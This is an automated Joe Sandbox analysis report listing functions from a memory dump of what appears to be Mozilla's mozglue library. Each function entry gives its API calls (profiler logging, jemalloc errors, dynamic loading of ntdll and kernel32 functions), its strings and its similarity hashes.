Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: f84841580bed524b7193ec7398748102c90c56b468ac830f6a53935fa1e8d8bc
Instruction ID: 5ebc18347cdce2e6c4c196cc0c98d8f41758e16dacbf56acbe91b7dc95ca951f
Opcode Fuzzy Hash: f84841580bed524b7193ec7398748102c90c56b468ac830f6a53935fa1e8d8bc
Instruction Fuzzy Hash: AA21D5B07442086BEB105A66CC85FFBB37CDFC6704F044528F6459B5C0C675AD54C6AA

Function 6C69F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C69F598), ref: 6C69F621

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69F637
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8,?,?,00000000,?,6C69F598), ref: 6C69F645
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8,?,?,00000000,?,6C69F598), ref: 6C69F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C69F62A

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: e2d03c83da65c5bc3704851d928221812889342721b3c5fc36cc22143e4ac105
Instruction ID: 0bd65e644daed088f08fe6fcc9a834646c2bc799f70e34fbc658b7f133535696
Opcode Fuzzy Hash: e2d03c83da65c5bc3704851d928221812889342721b3c5fc36cc22143e4ac105
Instruction Fuzzy Hash: 4D119175201206ABCB44AF5AC8889A97779FFC6759F550416FA0583F01CB71B812CBAE

Function 6C6B76C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C6B76F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C6B7705

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C6B7717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C6B778F,00000000,00000000,00000000,00000000), ref: 6C6B7731
free.MOZGLUE(00000000), ref: 6C6B7760

Strings

}>il, xrefs: 6C6B76C4

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID: }>il
API String ID: 2538299546-1725928026
Opcode ID: 2195319edaf78c9abde5db2944dedad8b5fbb5b4cca38b54291dd1d8e3d53320
Instruction ID: 69dadac1c372adee9e4d185efa5b35e7bcfef7ba5702c5b4d1b166416e3f892e
Opcode Fuzzy Hash: 2195319edaf78c9abde5db2944dedad8b5fbb5b4cca38b54291dd1d8e3d53320
Instruction Fuzzy Hash: C811C4B19042156BE710AF7A9C44BABBEE8EF46354F044439F848E7300E7709850C7F6

Function 6C660EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C68D9F0,00000000), ref: 6C660F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C660F3C
__Init_thread_footer.LIBCMT ref: 6C660F50
FreeLibrary.KERNEL32(?,6C68D9F0,00000000), ref: 6C660F86

Strings

CoInitializeEx, xrefs: 6C660F36
combase.dll, xrefs: 6C660F18

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 3aea649bdf82269b74aab9dc918a159452dd4dc8024e20fc0460376b7e1b97a9
Instruction ID: 3142b6849d6ec6b95381f9596ef0e0d97da1d837e232cb8c17506ce709f15651
Opcode Fuzzy Hash: 3aea649bdf82269b74aab9dc918a159452dd4dc8024e20fc0460376b7e1b97a9
Instruction Fuzzy Hash: F311C6743152419BDF10CF57C988A493774E79B325F004629ED0583B41D772B401CA5F

Function 6C69F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F561

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69F577
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F585
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F5A3

Strings

[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C69F56A
[I %d/%d] profiler_resume, xrefs: 6C69F239
[I %d/%d] profiler_pause_sampling, xrefs: 6C69F3A8
[I %d/%d] profiler_resume_sampling, xrefs: 6C69F499

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: ddaf6f8b125b3f6f6eed465e4a80a9166bf3288553cff3e0002d544b284c5598
Instruction ID: c3c579bf121b4f29216cc944803579b568ea5ae6b2b9047ff900d25c0825af38
Opcode Fuzzy Hash: ddaf6f8b125b3f6f6eed465e4a80a9166bf3288553cff3e0002d544b284c5598
Instruction Fuzzy Hash: 82F0B4752002059FDB006F669C8895E77BDEFCA29EF010415FA0583706CF31A801876E

Function 6C660E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C660DF8), ref: 6C660E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C660EA1
__Init_thread_footer.LIBCMT ref: 6C660EB5
FreeLibrary.KERNEL32 ref: 6C660EC5

Strings

kernel32.dll, xrefs: 6C660E7D
GetProcessMitigationPolicy, xrefs: 6C660E9B

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: e11fd40302de7fece80d3faaaf52c34881f3f9f852b453f3802d9b70b70de60d
Instruction ID: 04721a74647996172587f100570ada726f5cd43541baddcb8b94d007b7167caf
Opcode Fuzzy Hash: e11fd40302de7fece80d3faaaf52c34881f3f9f852b453f3802d9b70b70de60d
Instruction Fuzzy Hash: 720146747003928BDF008FABEA94BE233B5E746759F104525EA0182F84DB74B406CA1F

Function 6C69F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C69F598), ref: 6C69F621

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69F637
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8,?,?,00000000,?,6C69F598), ref: 6C69F645
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8,?,?,00000000,?,6C69F598), ref: 6C69F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C69F62A

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: ac30b7a3da0f63cb2ecde626f544fcda8337d725f7d8c642dc04f256e4dc61ae
Instruction ID: 0ca6b029334713368cae37ce8458285ea3134e2d024130434b58c9ec30fc0ab5
Opcode Fuzzy Hash: ac30b7a3da0f63cb2ecde626f544fcda8337d725f7d8c642dc04f256e4dc61ae
Instruction Fuzzy Hash: FFF05475200205AFDF006F668C8895A777DEFCA29DF150415FA0583746DB756806876E

Function 6C6905F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C68CFAE,?,?,?,6C6531A7), ref: 6C6905FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C68CFAE,?,?,?,6C6531A7), ref: 6C690616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6531A7), ref: 6C69061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6531A7), ref: 6C690627

Strings

<jemalloc>, xrefs: 6C6905FA, 6C69060F
: (malloc) Error in VirtualFree(), xrefs: 6C69061B, 6C690625

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 718c23f9e1cf966c788dd71da6affca665d055ee368c1ec450e64d4ade668484
Instruction ID: 48e1536f2f0669c544160619b682af56469d35fc0a8b4f871b052f5e726b8a34
Opcode Fuzzy Hash: 718c23f9e1cf966c788dd71da6affca665d055ee368c1ec450e64d4ade668484
Instruction Fuzzy Hash: 69E08CE2A0101037F6142256BC86DBB761CDBC6134F080039FE0E83341E94ABD1A51FB

Function 6C6605F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 718b1e7a507a29194bee81f70a1d2deeffb3db7465f21d181ead2f123607c46d
Instruction ID: 5d20436572da2bca74fa40327ce16ae1097bfe10773e91a6ef8623a71e3834a3
Opcode Fuzzy Hash: 718b1e7a507a29194bee81f70a1d2deeffb3db7465f21d181ead2f123607c46d
Instruction Fuzzy Hash: 8AA15AB0A016458FDB24CF2AC594A99FBF1BF49304F44866ED44A97B00E731BA85CF99

Function 6C6B14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6B14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6B14E2
GetCurrentThreadId.KERNEL32 ref: 6C6B1546
InitializeConditionVariable.KERNEL32(?), ref: 6C6B15BA
free.MOZGLUE(?), ref: 6C6B16B4

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 84b113b9a73e277b9fd29e08484e4394e3a35ff6a497e3b0073eb4c8ef52548c
Instruction ID: aba4de780e88ec0fbd8ae92ed5aa9381c591fd8fdf4d159ca99d83c8d4769e11
Opcode Fuzzy Hash: 84b113b9a73e277b9fd29e08484e4394e3a35ff6a497e3b0073eb4c8ef52548c
Instruction Fuzzy Hash: 2361F572A007009BDB118F25C880BDEB7B5BF8A308F04851DED8A67711EB31E955CB99

Function 6C6ADC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6ADC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C6AD38A,?), ref: 6C6ADC6F
free.MOZGLUE(?,?,?,?,?,6C6AD38A,?), ref: 6C6ADCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C6AD38A,?), ref: 6C6ADCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C6AD38A,?), ref: 6C6ADD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C6AD38A,?), ref: 6C6ADD4A

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: e832c0ffbb3be5372cd064647279fbc88c4c6da441537e842909aca23f795383
Instruction ID: bcadd9162a49f29ceb0e17f71bb7541758fe66ea6d43d186fbb7bff36c009d76
Opcode Fuzzy Hash: e832c0ffbb3be5372cd064647279fbc88c4c6da441537e842909aca23f795383
Instruction Fuzzy Hash: 24416BB5A00605DFCB00CF99C88099AB7F5FF89314B654569DE46ABB11D771FC02CB98

Function 6C68F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C68F480

Part of subcall function 6C65F100: LoadLibraryW.KERNEL32(shell32,?,6C6CD020), ref: 6C65F122
Part of subcall function 6C65F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C65F132

CloseHandle.KERNEL32(00000000), ref: 6C68F555

Part of subcall function 6C6614B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C661248,6C661248,?), ref: 6C6614C9
Part of subcall function 6C6614B0: memcpy.VCRUNTIME140(?,6C661248,00000000,?,6C661248,?), ref: 6C6614EF

Part of subcall function 6C65EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C65EEE3

CreateFileW.KERNEL32 ref: 6C68F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C68F523

Strings

\oleacc.dll, xrefs: 6C68F4CB

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: e7e48814ea99a76f411752119c71c55213dd58cbadc32e0fce5a34836752ec9b
Instruction ID: 0d1bc788e9566150df40bd87b32a434fe4a46e126bf0021ca286a0276173a7db
Opcode Fuzzy Hash: e7e48814ea99a76f411752119c71c55213dd58cbadc32e0fce5a34836752ec9b
Instruction Fuzzy Hash: 4541BF706097109FE720DF29D884A9BB7F4AF95318F504A1CF59083690EB70E949CBAB

Function 6C6B74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C6B7526
__Init_thread_footer.LIBCMT ref: 6C6B7566
__Init_thread_footer.LIBCMT ref: 6C6B7597

Strings

kernel32.dll, xrefs: 6C6B7557
UnmapViewOfFile2, xrefs: 6C6B7552

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 615ffa97ad8c0de051b7642b4bca49c3847e34a81dded684b7e6253d4862282e
Instruction ID: 70c3812f21271e644d1c9f7080f2d601ef814584af8e9d41c780a69cb21825ee
Opcode Fuzzy Hash: 615ffa97ad8c0de051b7642b4bca49c3847e34a81dded684b7e6253d4862282e
Instruction Fuzzy Hash: 1621373270150197CB248FEAD894ED973B5EB87725F054529E80167B80DB31B9118BBF

Function 6C6BC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6BC0E9), ref: 6C6BC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C6BC437
FreeLibrary.KERNEL32(?,6C6BC0E9), ref: 6C6BC44C

Strings

ntdll.dll, xrefs: 6C6BC413
NtQueryVirtualMemory, xrefs: 6C6BC431

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: d4ad702163dedae234b04c25129513d6ca49606b68d6455ed9a7693a3667c5d7
Instruction ID: 0baf2aa69d8cf0f9d1a80e002f6a0c30601aa36f70604daba40d504ae963cc98
Opcode Fuzzy Hash: d4ad702163dedae234b04c25129513d6ca49606b68d6455ed9a7693a3667c5d7
Instruction Fuzzy Hash: 14E0B670B01302ABDF007F73C9887127BF8AB46745F044516AB0592614EBB0F652CB5F

Function 6C6B75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6B748B,?), ref: 6C6B75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C6B75D7
FreeLibrary.KERNEL32(?,6C6B748B,?), ref: 6C6B75EC

Strings

RtlNtStatusToDosError, xrefs: 6C6B75D1
ntdll.dll, xrefs: 6C6B75B3

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 0ed2408e784dd703723be8bc13cc7e9168facbfe92853743f00b8c28fd63a019
Instruction ID: 599b689ad59f66e73d5d34581d44cd022478ec4cd9cadc224c2f026cf24e048d
Opcode Fuzzy Hash: 0ed2408e784dd703723be8bc13cc7e9168facbfe92853743f00b8c28fd63a019
Instruction Fuzzy Hash: 8FE0B671600302ABEF006FE3E9C87817AF8EB46359F108425AA15D6650EFB0B452CF5E

